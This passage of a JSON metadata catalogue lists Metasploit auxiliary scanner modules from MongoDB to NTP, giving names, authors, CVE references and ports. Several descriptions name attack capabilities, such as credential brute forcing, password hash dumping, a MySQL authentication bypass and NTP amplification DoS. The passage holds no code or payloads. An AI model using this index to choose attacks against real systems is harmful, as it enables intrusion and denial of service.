"path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
"is_install_path": true,
"ref_name": "scanner/misc/sunrpc_portmapper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/misc/zenworks_preboot_fileaccess": {
"name": "Novell ZENworks Configuration Management Preboot Service Remote File Access",
"full_name": "auxiliary/scanner/misc/zenworks_preboot_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal in the ZENworks Configuration Management.\n The vulnerability exists in the Preboot service and can be triggered by sending a specially\n crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been\n successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.",
"references": [
"CVE-2012-2215",
"OSVDB-80230",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975"
],
"platform": "",
"arch": "",
"rport": 998,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/misc/zenworks_preboot_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mongodb/mongodb_login": {
"name": "MongoDB Login Utility",
"full_name": "auxiliary/scanner/mongodb/mongodb_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Gregory Man <man.gregory@gmail.com>"
],
"description": "This module attempts to brute force authentication credentials for MongoDB.\n Note that, by default, MongoDB does not require authentication.",
"references": [
"URL-http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol",
"URL-http://www.mongodb.org/display/DOCS/Implementing+Authentication+in+a+Driver"
],
"platform": "",
"arch": "",
"rport": 27017,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
"is_install_path": true,
"ref_name": "scanner/mongodb/mongodb_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/motorola/timbuktu_udp": {
"name": "Motorola Timbuktu Service Detection",
"full_name": "auxiliary/scanner/motorola/timbuktu_udp",
"rank": 300,
"disclosure_date": "2009-09-25",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply sends a packet to the Motorola Timbuktu service for detection.",
"references": [
],
"platform": "",
"arch": "",
"rport": 407,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
"is_install_path": true,
"ref_name": "scanner/motorola/timbuktu_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mqtt/connect": {
"name": "MQTT Authentication Scanner",
"full_name": "auxiliary/scanner/mqtt/connect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module attempts to authenticate to MQTT.",
"references": [
"URL-http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Table_3.1_-"
],
"platform": "",
"arch": "",
"rport": 1883,
"autofilter_ports": [
1883,
8883
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-20 18:44:43 +0000",
"path": "/modules/auxiliary/scanner/mqtt/connect.rb",
"is_install_path": true,
"ref_name": "scanner/mqtt/connect",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msf/msf_rpc_login": {
"name": "Metasploit RPC Interface Login Utility",
"full_name": "auxiliary/scanner/msf/msf_rpc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to a\n Metasploit RPC interface using a specific\n user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 55553,
"autofilter_ports": [
3790
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-14 06:34:04 +0000",
"path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb",
"is_install_path": true,
"ref_name": "scanner/msf/msf_rpc_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/msf/msf_web_login": {
"name": "Metasploit Web Interface Login Utility",
"full_name": "auxiliary/scanner/msf/msf_web_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to a Metasploit\n web interface using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3790,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
55553
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/msf/msf_web_login.rb",
"is_install_path": true,
"ref_name": "scanner/msf/msf_web_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msmail/exchange_enum": {
"name": "Exchange email enumeration",
"full_name": "auxiliary/scanner/msmail/exchange_enum",
"rank": 300,
"disclosure_date": "2018-11-06",
"type": "auxiliary",
"author": [
"poptart",
"jlarose",
"Vincent Yiu",
"grimhacker",
"Nate Power",
"Nick Powers",
"clee-r7"
],
"description": "Error-based user enumeration for Office 365 integrated email addresses",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-07 13:29:56 +0000",
"path": "/modules/auxiliary/scanner/msmail/exchange_enum.go",
"is_install_path": true,
"ref_name": "scanner/msmail/exchange_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msmail/host_id": {
"name": "Vulnerable domain identification",
"full_name": "auxiliary/scanner/msmail/host_id",
"rank": 300,
"disclosure_date": "2018-11-06",
"type": "auxiliary",
"author": [
"poptart",
"jlarose",
"Vincent Yiu",
"grimhacker",
"Nate Power",
"Nick Powers",
"clee-r7"
],
"description": "Identifying potentially vulnerable Exchange endpoints",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-07 13:29:56 +0000",
"path": "/modules/auxiliary/scanner/msmail/host_id.go",
"is_install_path": true,
"ref_name": "scanner/msmail/host_id",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/msmail/onprem_enum": {
"name": "On premise user enumeration",
"full_name": "auxiliary/scanner/msmail/onprem_enum",
"rank": 300,
"disclosure_date": "2018-11-06",
"type": "auxiliary",
"author": [
"poptart",
"jlarose",
"Vincent Yiu",
"grimhacker",
"Nate Power",
"Nick Powers",
"clee-r7"
],
"description": "On premise enumeration of valid exchange users",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-07 13:29:56 +0000",
"path": "/modules/auxiliary/scanner/msmail/onprem_enum.go",
"is_install_path": true,
"ref_name": "scanner/msmail/onprem_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_hashdump": {
"name": "MSSQL Password Hashdump",
"full_name": "auxiliary/scanner/mssql/mssql_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the usernames and encrypted password\n hashes from a MSSQL server and stores them for later cracking.\n This module also saves information about the server version and\n table names, which can be used to seed the wordlist.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_hashdump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_login": {
"name": "MSSQL Login Utility",
"full_name": "auxiliary/scanner/mssql/mssql_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).",
"references": [
"CVE-1999-0506"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_ping": {
"name": "MSSQL Ping Utility",
"full_name": "auxiliary/scanner/mssql/mssql_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the MSSQL instance for information.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_ping",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mssql/mssql_schemadump": {
"name": "MSSQL Schema Dump",
"full_name": "auxiliary/scanner/mssql/mssql_schemadump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to extract the schema from a MSSQL Server\n Instance. It will disregard builtin and example DBs such\n as master, model, msdb, and tempdb. The module will create\n a note for each DB found, and store a YAML formatted output\n as loot for easy reading.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-31 14:08:27 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_schemadump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_authbypass_hashdump": {
"name": "MySQL Authentication Bypass Password Dump",
"full_name": "auxiliary/scanner/mysql/mysql_authbypass_hashdump",
"rank": 300,
"disclosure_date": "2012-06-09",
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"jcran <jcran@metasploit.com>"
],
"description": "This module exploits a password bypass vulnerability in MySQL in order\n to extract the usernames and encrypted password hashes from a MySQL server.\n These hashes are stored as loot for later cracking.",
"references": [
"CVE-2012-2122",
"OSVDB-82804",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_authbypass_hashdump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_file_enum": {
"name": "MYSQL File/Directory Enumerator",
"full_name": "auxiliary/scanner/mysql/mysql_file_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robin Wood <robin@digininja.org>"
],
"description": "Enumerate files and directories using the MySQL load_file feature, for more\n information see the URL in the references.",
"references": [
"URL-http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html",
"URL-http://www.digininja.org/projects/mysql_file_enum.php"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_file_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_hashdump": {
"name": "MYSQL Password Hashdump",
"full_name": "auxiliary/scanner/mysql/mysql_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the usernames and encrypted password\n hashes from a MySQL server and stores them for later cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-02-08 13:48:24 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_hashdump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_login": {
"name": "MySQL Login Utility",
"full_name": "auxiliary/scanner/mysql/mysql_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>"
],
"description": "This module simply queries the MySQL instance for a specific user/pass (default is root with blank).",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_schemadump": {
"name": "MYSQL Schema Dump",
"full_name": "auxiliary/scanner/mysql/mysql_schemadump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the schema information from a\n MySQL DB server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_schemadump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_version": {
"name": "MySQL Server Version Enumeration",
"full_name": "auxiliary/scanner/mysql/mysql_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerates the version of MySQL servers.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/mysql/mysql_writable_dirs": {
"name": "MYSQL Directory Write Test",
"full_name": "auxiliary/scanner/mysql/mysql_writable_dirs",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"AverageSecurityGuy <stephen@averagesecurityguy.info>"
],
"description": "Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more\n information see the URL in the references. ***Note: For every writable directory found,\n a file with the specified FILE_NAME containing the text test will be written to the directory.***",
"references": [
"URL-https://dev.mysql.com/doc/refman/5.7/en/select-into.html"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_writable_dirs",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/natpmp/natpmp_portscan": {
"name": "NAT-PMP External Port Scanner",
"full_name": "auxiliary/scanner/natpmp/natpmp_portscan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Scan NAT devices for their external listening ports using NAT-PMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5351,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb",
"is_install_path": true,
"ref_name": "scanner/natpmp/natpmp_portscan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_ntp_login": {
"name": "Nessus NTP Login Utility",
"full_name": "auxiliary/scanner/nessus/nessus_ntp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module attempts to authenticate to a Nessus NTP service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1241,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-20 21:25:34 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_ntp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_rest_login": {
"name": "Nessus RPC Interface Login Utility",
"full_name": "auxiliary/scanner/nessus/nessus_rest_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"void_in"
],
"description": "This module will attempt to authenticate to a Nessus server RPC interface.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8834,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-14 11:16:41 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_rest_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_xmlrpc_login": {
"name": "Nessus XMLRPC Interface Login Utility",
"full_name": "auxiliary/scanner/nessus/nessus_xmlrpc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to a Nessus XMLRPC interface using a\n specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8834,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_xmlrpc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nessus/nessus_xmlrpc_ping": {
"name": "Nessus XMLRPC Interface Ping Utility",
"full_name": "auxiliary/scanner/nessus/nessus_xmlrpc_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to find and check\n for Nessus XMLRPC interface.'",
"references": [
],
"platform": "",
"arch": "",
"rport": 8834,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb",
"is_install_path": true,
"ref_name": "scanner/nessus/nessus_xmlrpc_ping",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/netbios/nbname": {
"name": "NetBIOS Information Discovery",
"full_name": "auxiliary/scanner/netbios/nbname",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover host information through NetBIOS",
"references": [
],
"platform": "",
"arch": "",
"rport": 137,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/netbios/nbname.rb",
"is_install_path": true,
"ref_name": "scanner/netbios/nbname",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nexpose/nexpose_api_login": {
"name": "NeXpose API Interface Login Utility",
"full_name": "auxiliary/scanner/nexpose/nexpose_api_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to a NeXpose API interface using a\n specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3780,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb",
"is_install_path": true,
"ref_name": "scanner/nexpose/nexpose_api_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nfs/nfsmount": {
"name": "NFS Mount Scanner",
"full_name": "auxiliary/scanner/nfs/nfsmount",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module scans NFS mounts and their permissions.",
"references": [
"CVE-1999-0170",
"URL-http://www.ietf.org/rfc/rfc1094.txt"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
"is_install_path": true,
"ref_name": "scanner/nfs/nfsmount",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/nntp/nntp_login": {
"name": "NNTP Login Utility",
"full_name": "auxiliary/scanner/nntp/nntp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to authenticate to NNTP services\n which support the AUTHINFO authentication extension.\n\n This module supports AUTHINFO USER/PASS authentication,\n but does not support AUTHINFO GENERIC or AUTHINFO SASL\n authentication methods.",
"references": [
"CVE-1999-0502",
"URL-https://tools.ietf.org/html/rfc3977",
"URL-https://tools.ietf.org/html/rfc4642",
"URL-https://tools.ietf.org/html/rfc4643"
],
"platform": "",
"arch": "",
"rport": 119,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
"is_install_path": true,
"ref_name": "scanner/nntp/nntp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_monlist": {
"name": "NTP Monitor List Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_monlist",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module identifies NTP servers which permit \"monlist\" queries and\n obtains the recent clients list. The monlist feature allows remote\n attackers to cause a denial of service (traffic amplification)\n via spoofed requests. The more clients there are in the list, the\n greater the amplification.",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-013A",
"URL-http://support.ntp.org/bin/view/Main/SecurityNotice",
"URL-http://nmap.org/nsedoc/scripts/ntp-monlist.html"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_monlist",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_nak_to_the_future": {
"name": "NTP \"NAK to the Future\"",
"full_name": "auxiliary/scanner/ntp/ntp_nak_to_the_future",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matthew Van Gundy of Cisco ASIG",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Crypto-NAK packets can be used to cause ntpd to accept time from\n unauthenticated ephemeral symmetric peers by bypassing the\n authentication required to mobilize peer associations. This module\n sends these Crypto-NAK packets in order to establish an association\n between the target ntpd instance and the attacking client. The end goal\n is to cause ntpd to declare the legitimate peers \"false tickers\" and\n choose the attacking clients as the preferred peers, allowing\n these peers to control time.",
"references": [
"URL-http://talosintel.com/reports/TALOS-2015-0069/",
"URL-http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html",
"URL-http://support.ntp.org/bin/view/Main/NtpBug2941",
"CVE-2015-7871"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_nak_to_the_future",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_peer_list_dos": {
"name": "NTP Mode 7 PEER_LIST DoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_peer_list_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit \"PEER_LIST\" queries and\n return responses that are larger in size or greater in quantity than\n the request, allowing remote attackers to cause a distributed, reflected\n denial of service (aka, \"DRDoS\" or traffic amplification) via spoofed\n requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_peer_list_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_peer_list_sum_dos": {
"name": "NTP Mode 7 PEER_LIST_SUM DoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_peer_list_sum_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit \"PEER_LIST_SUM\" queries and\n return responses that are larger in size or greater in quantity than\n the request, allowing remote attackers to cause a distributed, reflected\n denial of service (aka, \"DRDoS\" or traffic amplification) via spoofed\n requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_peer_list_sum_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_readvar": {
"name": "NTP Clock Variables Disclosure",
"full_name": "auxiliary/scanner/ntp/ntp_readvar",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ewerson Guimaraes(Crash) <crash@dclabs.com.br>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module reads the system internal NTP variables. These variables contain\n potentially sensitive information, such as the NTP software version, operating\n system version, peers, and more.",
"references": [
"CVE-2013-5211",
"URL-http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_readvar",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_req_nonce_dos": {
"name": "NTP Mode 6 REQ_NONCE DRDoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_req_nonce_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit mode 6 REQ_NONCE requests that\n can be used to conduct DRDoS attacks. In some configurations, NTP servers will\n respond to REQ_NONCE requests with a response larger than the request,\n allowing remote attackers to cause a distributed, reflected\n denial of service (aka, \"DRDoS\" or traffic amplification) via spoofed\n requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
